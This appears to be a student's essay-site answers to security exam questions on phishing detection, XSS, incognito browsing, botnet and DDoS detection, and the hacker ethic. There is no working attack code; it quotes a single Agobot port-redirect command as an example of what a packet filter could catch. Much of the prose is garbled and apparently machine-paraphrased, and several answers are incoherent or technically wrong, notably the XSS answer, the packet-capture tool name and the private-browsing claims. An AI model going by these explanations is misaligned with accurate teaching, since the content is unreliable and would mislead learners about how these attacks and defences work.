Systems Much More Secure Computer Science Essay

Published: Last Edited:

This essay has been submitted by a student. This is not an example of the work written by our professional essay writers.

This question is stolen from someone elses exam. Phishing web sites create a copy of a legitimate web site and present to the user an authentic-looking login page. When the user enters a login credential (username/password) the data is recorded and later collected by the Phisher. The Phisher can drive traffic to the phishing page using a number of techniques, including spam email and ads.

(a) Login pages are typically served over HTTPS using the site's certificate.

How can phishers who do not want to pay for a certificate get around this?

The one way the phisher use is to compromise the website which has already got the SSL and host the phishing page as under the same domain. And they usually go that far when they have a strong believe they are going to get much out of it.

Scammers often host phishing content on a website for the risk and thus can take advantage of a site certificate, but may not realize that they have a SSL services available and therefore the content via HTTP. Appeared any of the certificates found on phishing sites in this period to have been issued specifically for the purpose of deception

(b) Some phishers copy the login page as is. That is, they copy the login

page, but leave the embedded image links pointing to the real banking site. Explain

how a banking site can use this fact to detect phishing sites.

The number of times the attackers phishing Web page design so that images are selected even from the original location, rather than maintaining the repository of images on his Web site a fake. When a user loads a phishing Web page, and the browser goes and takes pictures of the original site. Reference URL seems as the original site URL of the site will be fake Bank]. On the original site if we analyze the web server logs and looking for suspicious Mentor will be able to detect a phishing attack in progress. There is a possibility that attacker can save the images not refer them to the website.

another way they use if the phisher is has copied HTML code and images from their website .As Thus, the phishers have the authentic site before visiting the fake Location. Coding the IP address and a time stamp, as part of your HTML code they probably find out if the code was copied from their site, and the copied it. There are numerous ways to achieve this. Add Facilities between HTML tags, including additional GET parameters, or even watermark Images. The most appropriate method will depend on your web infrastructure.

(c) Some phishers may make a complete copy of the phished site, duplicating all images and scripts on the target page and store them on the phishing server.

They copy Javascript on the phished page, but without altering the script. Explain how a bank can use this fact to not only detect phishing sites, but also detect which of its customers fell victim to the phishing scam. The bank can then move to block those customers' accounts.

The simple way they detect is, just insert something like obfuscated JavaScript on their original location mean website location which alerts them if someone is working under any address other than the original one.

(d) Suppose the banking login page has an XSS vulnerability. Explain how this can make the phisher's life easier.

Attacker can make a Cross site scripting attack with XSS vulnerabilities and allow an attacker to generate links to a Web site which, when clicked, provide active content which appears to originate from the site. Then the attacker can easily Decode it from HEX and with the obfuscating padding Removed and he can Get the IP from it.

This would cause the browser to not only download a JavaScript script from the attacker's site

,but also to process it in the context web application, due to a failure in web application to properly escape quote characters and HTML tags.

3. Your friend thinks he's a security expert (though he hasn't been to TAFE) and claims that the best way to protect your data when using the Internet at home is to use the "private" or "incognito" mode in Firefox or Chrome for sensitive transactions. What security benefits does such an action provide? Is this really a valid way to protect your information? If it isn't, how would you take this guy down?


The Only good feature about private browsing is they don't save visited pages like it will not add any sites in a history menu or an awesome bar list. No new password will be saved on it , nothing you enter on a search bar or somewhere will be on auto save option. You will not found any download file history here. Cookies will only store limited information of the websites , like login status and data use like java ETC.

Disadvantages :

Now where Private browsing is Useful, it's not that effective to save you from some attacks suck as

Keylogging to get you usernames and passwords, Stealing Browsing Cache Data to obtain you sensitive information also with that he can lift the wifi username and passwords, virus attacks after you info and tracking programs .

4. (This question is stolen from someone else's exam). A bot is remotely controlled software, executing on a compromised host. A botnet is a network of bots and a controller that controls their operation. Most bots are highly programmable, allowing the bot controller to send programs that are executed by bots. Bot detection and remediation can be carried out on a network by examining network traffic, or on a host by trying to identify software that is acting as a bot.

(a) Bots are widely used for relaying email spam. Describe a network defense that detects bots used for spam.

Spam filtering service is a basic and the affective way to detect the spam emails Bots, if you are running it with the antivirus its automatically going to Remove the spam, virus and other email borne threats via cloud. It's also going to prevent unwanted spam and block the email virus.

(b) Bots have been used for launching distributed denial of service (DDoS) attacks. Describe a network defense that detects bots carrying out a DDoS attack. Use some characteristic of the way DDoS attacks are usually done other than measuring the amount of network traffic coming from a host on the network.

We can neutralize botnet headers ( there are usually Few ddos handlers deployed as compared to the number of agents ) neutralizing few handlers can possibly render multiple agents unless , thus thwarting DDOs attacks.

Through snort as an IDS/IPS rules can be set to match potential DDoS Attacks from the network using Snort's sensor ID (SID) as a mechanism to perform packet logging.Activity log , Change point detection ( we look for what is normal and what is abnormal going on ) and with Wavelenght program to analyse the signals.

and also we can use Wire shark to capture the packets of network , some of the packets are in Red can lead or tell us about the DDOS on the server. DDOS attacks often are Syn floods coming from all over the globe.

There is another way of Detecting a DDOS Attacks its called a common intrusion detection framework A boxes - Network activity analysis devices that can be specific hardware, software or both They gather information and look for defined patterns. These patterns can include the consistent stream of packets by Trojans or viruses. An A box is great for detecting DDoS attacks and router attacks.

Detect and Stop Malicious Requests - Because application DDoS attacks mimic regular Web application traffic, they can be difficult to detect through typical network DDoS techniques. However, using a combination of application-level controls and anomaly detection, organizations can identify and stop malicious traffic. Measures include:

Detect an excessive number of requests from a single source or user session - Automated attack sources almost always request Web pages more rapidly than standard users.

Prevent known network and application DDoS attacks - Many types of DDoS attacks rely on simple network techniques like fragmented packets, spoofing, or not completing TCP handshakes. More advanced attacks, typically application-level attacks, attempt to overwhelm server resources. These attacks can be detected through unusual user activity and known application attack signatures.

Distinguish the attributes, and the aftermath, of a malicious request. Some DDoS attacks can be detected through known attack patterns or signatures. In addition, many malicious Web requests do not conform to HTTP protocol standards. For instance, the Slowloris DDoS attack included redundant HTTP headers. In addition, DDoS clients may request Web pages that do not exist. Attacks may also generate Web server errors or slow Web server response time

(c) One possible way to do host-based bot detection is to compare contents of network packets that might be commands from the controller with system calls on the host. Explain how this idea might help you detect a bot executing a port redirect command (i.e. receive input on one port and send it back out on another).

using Libcap to capture the network traffic and filtering using the string "redirect" to determine any executable command from the captured packet.

For example the agobot which uses the following executable commands:

<Ago> .redirect.tcp 2352 80

<Agobot3> redirtcp: redirecting from port 2352 to "".

therefore by applying a filter search "redirect" would possibly shows this type of packet which then could be used for identifying botnets within the host machine.

5. From


The idea of a "hacker ethic" is perhaps best formulated in Steven Levy's 1984 book, Hackers: Heroes of the Computer Revolution. Levy came up with six tenets:

1. Access to computers - and anything which might teach you something about the way the world works - should be unlimited and total. Always yield to the Hands-On imperative!

2. All information should be free.

3. Mistrust authority - promote decentralization.

4. Hackers should be judged by their hacking, not bogus criteria such as degress, age, race, or position.

5. You can create art and beauty on a computer.

6. Computers can change your life for the better.



ibid, from Richard Stallman

"I don't know if there actually is a hacker's ethic as such, but there sure was an M.I.T. Artificial Intelligence Lab ethic. This was that bureaucracy should not be allowed to get in the way of doing anything useful. Rules did not matter - results mattered. Rules, in the form of computer security or locks on doors, were held in total, absolute disrespect. We would be proud of how quickly we would sweep away whatever little piece of bureaucracy was getting in the way, how little time it forced you to waste. Anyone who dared to lock a terminal in his office, say because he was a professor and thought he was more important than other people, would likely find his door left open the next morning. I would just climb over the ceiling or under the floor, move the terminal out, or leave the door open with a note saying what a big inconvenience it is to have to go under the floor, "so please do not inconvenience people by locking the door any longer." Even now, there is a big wrench at the AI Lab entitled "the seventh-floor master key", to be used in case anyone dares to lock up one of the more fancy terminals."


The types of people who are interested and passionate about hacking are the same types of people who are charged with the protection of the networks they seek to exploit. It's almost as if the inmates are taking over the asylum! Discuss how the hacker ethic can lead to the ethical hacker?

Like in ethics its more about Grey hat hacker, a person with no permission his intentions are good but he has no permission to hack, or we can say he is not an ethical hacker. Hacking into the computer is not that simple as it discussed it's a time talking and a long process, hacker spend most of their time with the computers not with their family and friends.

I will give you one example in 2011 a guy found a flaw in a superannuation website, while he was going through his superfund he changed some parameters on the url which lead him to someone else super details, so for further testing he gone through 50 more accounts and downloaded their super details as a proof including nsw police officers and magistrates , then he contacted the company and mentioned them there vulnerability in a website. And he was doing it for a good deed but super company has disabled his account straight away and end up sending a police with the legal letter stating of threatening legal action.

As Levy pointed out, this person was being a hacker on the basis hoping to change the life of the infected users by pointing out the potential flaws identified but the authority denies such art performed on the computer that would potentially enhance the security flaws that are apparent in the case.

Past experience leads him to become an ethical hacker on the basis of (4. Hackers should be judged by their hacking, not bogus criteria such as degrees, age, race, or position) he is running his own company now .

And We have a story about Kevin Mitnick how he become an ethical hacker out of Black hat, it's about the opportunity and chance and looking at the skills of a person

Ethical hackers know various penalties within their jurisdiction hence, all security auditing and pen testing should be performed legally on the basis of granted permission otherwise misused of such may result severely and therefore it's not just running a sets of tools on a system to determine what is exploitable within that network. As Levy stated, that having access to computers enhances the learning experiences and therefore anticipates the hands-on-practicality, which eventually may change the world by demonstrating better and efficient security measures within the network. Often ethical hacking takes places when flaws are apparent and as such it is relatively expensive, however with the people around the internet assisting and exploiting areas of vulnerabilities shows the aspect of Sharing pointed out by Levy's accountable aspect similar to that shown with MIT AI Lab.